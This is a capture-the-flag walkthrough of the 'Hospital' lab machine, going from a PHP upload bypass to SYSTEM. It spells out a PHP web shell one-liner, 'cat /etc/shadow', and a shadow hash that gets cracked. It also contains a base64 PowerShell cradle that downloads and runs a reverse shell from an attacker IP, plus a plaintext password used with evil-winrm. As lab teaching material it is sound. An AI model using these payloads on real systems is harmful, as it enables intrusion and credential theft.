User Flag

Nmap scans:

sudo nmap -p- --min-rate=1000 -oN nmap.out hospital.htb

Pasted image 20250603073312.png

sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out hospital.htb

where $ports holds the comma-separated list of open ports found by the first scan.

Pasted image 20250603073714.png

Navigating to the web application on port 8080:

Pasted image 20250603075848.png

After registering an account, we have access to a file upload feature:

Pasted image 20250603080001.png

Since this is a PHP web application, let’s try uploading a PHP web shell:

echo '<?php system($_REQUEST["cmd"]); ?>' > ./shell.php

Pasted image 20250603081519.png

Intercepting the upload request in a proxy:

Pasted image 20250603082105.png

we notice that the response redirects to /failed.php, so the .php extension is being rejected:

Pasted image 20250603082146.png

Trying other PHP-family extensions shows the filter is an extension blacklist rather than an allowlist: .phar is accepted and we get redirected to /success.php instead:

Pasted image 20250603085716.png

The success page doesn’t tell us where the file is stored, but brute-forcing directories reveals an /uploads directory:

feroxbuster --url http://hospital.htb:8080 -o feroxbuster_hospital.out

Pasted image 20250603090140.png

Requesting our uploaded shell there returns HTTP 200, but with an empty body:

Pasted image 20250603201204.png

An empty body from a shell that parsed fine usually means the functions it calls are blocked by disable_functions. Let’s confirm by uploading a .phar that calls phpinfo():

Pasted image 20250603201446.png

We upload the file and access it the same way.

Pasted image 20250603201638.png

As expected, disable_functions lists a lot of functions, including system(), which our web shell relies on. We could probably build something on the functions that are still enabled, but let’s just use p0wny-shell, which tries several command-execution functions instead of depending on system():
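As an added example (my own, not from the writeup): once a phpinfo() page is available, the quickest way to answer "what is left to execute commands with?" is to parse the disable_functions row and diff it against the usual command-execution primitives. The phpinfo fragment below is constructed to show the shape of the HTML and is not the target’s actual list; it also accepts the CLI "key => value" form.

```python
import re

# Functions a webshell normally uses to run OS commands, plus the two that the
# classic mail()+putenv() LD_PRELOAD bypass needs when the others are gone.
EXEC_PRIMITIVES = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "pcntl_exec", "mail", "putenv")

# Constructed fragment in the shape of phpinfo() HTML: one <tr> per directive,
# with a local-value and a master-value column. Not the real list from the box.
SAMPLE_PHPINFO_HTML = (
    '<tr><td class="e">disable_functions</td>'
    '<td class="v">system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec</td>'
    '<td class="v">system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec</td></tr>\n'
    '<tr><td class="e">open_basedir</td><td class="v">no value</td>'
    '<td class="v">no value</td></tr>\n'
)

# Matches the HTML table row and the CLI form "disable_functions => a,b => a,b".
DISABLE_RE = re.compile(
    r'disable_functions(?:</td><td class="v">|\s*=>\s*)([^<\n]*?)\s*(?:</td>|=>|$)',
    re.MULTILINE,
)


def parse_disable_functions(phpinfo_text: str) -> set[str]:
    """Return the set of function names listed in disable_functions."""
    m = DISABLE_RE.search(phpinfo_text)
    if not m or m.group(1).strip().lower() in ("", "no value"):
        return set()
    return {name.strip() for name in m.group(1).split(",") if name.strip()}


def remaining_exec_primitives(disabled: set[str]) -> list[str]:
    """Which of the known exec primitives are still callable."""
    return [f for f in EXEC_PRIMITIVES if f not in disabled]


if __name__ == "__main__":
    disabled = parse_disable_functions(SAMPLE_PHPINFO_HTML)
    print("disabled:", sorted(disabled))
    print("still available:", remaining_exec_primitives(disabled))
```

In the constructed case only mail() and putenv() survive, which is exactly the pair the LD_PRELOAD bypass needs; on a real target, feed the downloaded phpinfo output to parse_disable_functions() and read the list before choosing a shell.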

https://github.com/flozz/p0wny-shell

We upload the shell the same way and get:

Pasted image 20250603202224.png

From there we can launch a reverse shell:

Pasted image 20250603202558.png

Pasted image 20250603202859.png

Looking back at our nmap scan:

Pasted image 20250603202752.png

the TTL on port 8080 is 62, i.e. a Linux default of 64 minus two hops (Windows starts at 128, which the other ports show), so we landed in an Ubuntu VM rather than on the Windows machine we actually want. We need to escalate and pivot.
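Added example, not part of the original writeup: a small Python parser that pulls the per-port TTL out of nmap -vv normal output and splits the ports by likely OS family, which is the reasoning used above. The scan text is constructed to resemble this box’s layout (Windows services plus a forwarded Linux port) and is not the real output.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample in the shape of `nmap -sC -sV -vv -oN` normal output.
# -vv adds the REASON column, which carries the observed TTL for each port.
# Illustrative data only, not the real scan of hospital.htb.
SAMPLE_NMAP = """\
PORT     STATE SERVICE       REASON          VERSION
22/tcp   open  ssh           syn-ack ttl 62  OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos
445/tcp  open  microsoft-ds? syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp open  http          syn-ack ttl 62  Apache httpd 2.4.55 ((Ubuntu))
"""

# port/proto  state  service  reason ttl N  [version ...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+) ttl (\d+)")

# Default initial TTLs of common stacks. Every router hop decrements by one, so
# observed = initial - hops; we pick the smallest initial value >= observed.
INITIAL_TTLS = ((64, "Linux/Unix"), (128, "Windows"), (255, "Solaris/network"))


def guess_os(ttl: int) -> tuple[str, int]:
    """Return (os_family, hop_count) for an observed TTL."""
    for initial, family in INITIAL_TTLS:
        if ttl <= initial:
            return family, initial - ttl
    return "unknown", 0


def parse_open_ports(nmap_text: str) -> list[dict]:
    """Extract open ports with their TTL and OS guess from nmap -vv output."""
    ports = []
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if not m or m.group(3) != "open":
            continue
        port, proto, _state, service, _reason, ttl = m.groups()
        family, hops = guess_os(int(ttl))
        ports.append({"port": int(port), "proto": proto, "service": service,
                      "ttl": int(ttl), "os": family, "hops": hops})
    return ports


def split_by_stack(ports: list[dict]) -> dict[str, list[int]]:
    """Group open ports by inferred OS family. More than one group behind a
    single IP means some ports are forwarded to a different machine."""
    groups: dict[str, list[int]] = defaultdict(list)
    for p in ports:
        groups[p["os"]].append(p["port"])
    return {family: sorted(plist) for family, plist in groups.items()}


if __name__ == "__main__":
    parsed = parse_open_ports(SAMPLE_NMAP)
    for p in parsed:
        print(f"{p['port']}/{p['proto']:<3} ttl={p['ttl']:<3} -> {p['os']} ({p['hops']} hops)")
    print(split_by_stack(parsed))
```

Two families on one IP is the tell: ports 53/88/445/5985 answer with a Windows stack one hop away, while 22 and 8080 answer with a Linux stack two hops away, so a shell on 8080 lands in the forwarded VM, not on the host.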

Other than one user:

Pasted image 20250603203505.png

there isn’t anything special in the VM. Our only option seems to be an exploit for the old kernel it is running:

Pasted image 20250603203635.png

A Google search for that kernel version turns up this exploit:

https://github.com/synacktiv/CVE-2023-35001

Let’s try it:

git clone https://github.com/synacktiv/CVE-2023-35001.git

Pasted image 20250603204256.png

make

Pasted image 20250603204348.png

Now we start a Python web server and transfer the two necessary files, exploit and wrapper, to the VM:

Pasted image 20250603204559.png

Pasted image 20250603204529.png

Pasted image 20250603204625.png

Pasted image 20250603204726.png

Even as root there is still nothing particularly interesting on the VM, but root can read the shadow file, which gives us the password hash of the drwilliams user:

cat /etc/shadow

Pasted image 20250603204914.png

Let’s crack it with hashcat (the $6$ prefix is sha512crypt, mode 1800):

echo '$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/' > hash.txt

Pasted image 20250603205131.png

hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt.gz

Pasted image 20250603205613.png

With the cracked password we can now access some SMB shares:

Pasted image 20250603205851.png

We also find that there is a user drbrown:

Pasted image 20250603210619.png

Let’s try drwilliams’ credentials in the other web application:

Pasted image 20250605082424.png

Pasted image 20250605082455.png

There we find an email from drbrown, a user we already knew existed:

Pasted image 20250605083540.png

So drbrown is waiting for an .eps file that he will open with Ghostscript. Looking for Ghostscript exploits we find:

https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

This exploit creates an .eps file that executes a payload when Ghostscript processes it. Let’s try it. First we build our payload: a PowerShell download cradle, converted to UTF-16LE and then base64 so it can be passed to powershell -enc:

cat web_cradle.ps1 | iconv -t utf-16le | base64 -w0

Pasted image 20250605084756.png

Our payload is going to be:

powershell -enc SQBFAFgAKABJAFcAUgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOQA6ADgAMAAwADAALwByAGUAdgBfAHMAaABlAGwAbAAuAHAAcwAxACkACgA=

and we hand it to the exploit’s generator:

python CVE_2023_36664_exploit.py --generate --filename needle --extension eps --payload "powershell -enc SQBFAFgAKABJAFcAUgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOQA6ADgAMAAwADAALwByAGUAdgBfAHMAaABlAGwAbAAuAHAAcwAxACkACgA="

Pasted image 20250605085344.png

We get a needle.eps file. Let’s send it to drbrown and wait for our Python web server to get a hit for rev_shell.ps1, which the cradle downloads and executes:

Pasted image 20250605085750.png

And we receive a reverse shell:

Pasted image 20250605092625.png

Pasted image 20250605092721.png

In ghostscript.bat we find the password chr!$br0wn. Let’s see if it also works over WinRM:

Pasted image 20250605092917.png

Let’s winrm:

evil-winrm -i hospital.htb -u 'drbrown' -p 'chr!$br0wn'

Pasted image 20250605093001.png

And we now can get the user flag:

Pasted image 20250605093035.png

Root flag

In C:\ we find an xampp directory:

Pasted image 20250606203153.png

Checking the ACLs:

Pasted image 20250606203521.png

The htdocs folder gives SYSTEM and Administrators full control; regular users have read & execute, plus write permission in some subfolders. If the XAMPP Apache service runs under a privileged account, anything we can write into the webroot executes as that account.

So let’s drop a web shell in there and see whether commands run as NT AUTHORITY\SYSTEM:

Pasted image 20250606203823.png

Let’s reuse the earlier p0wny shell and request it through the host’s web server:

Pasted image 20250606204007.png

Now check who we are:

Pasted image 20250606204032.png

We are SYSTEM. All that’s left is to grab the flag:

Pasted image 20250606204326.png

Pasted image 20250606204401.png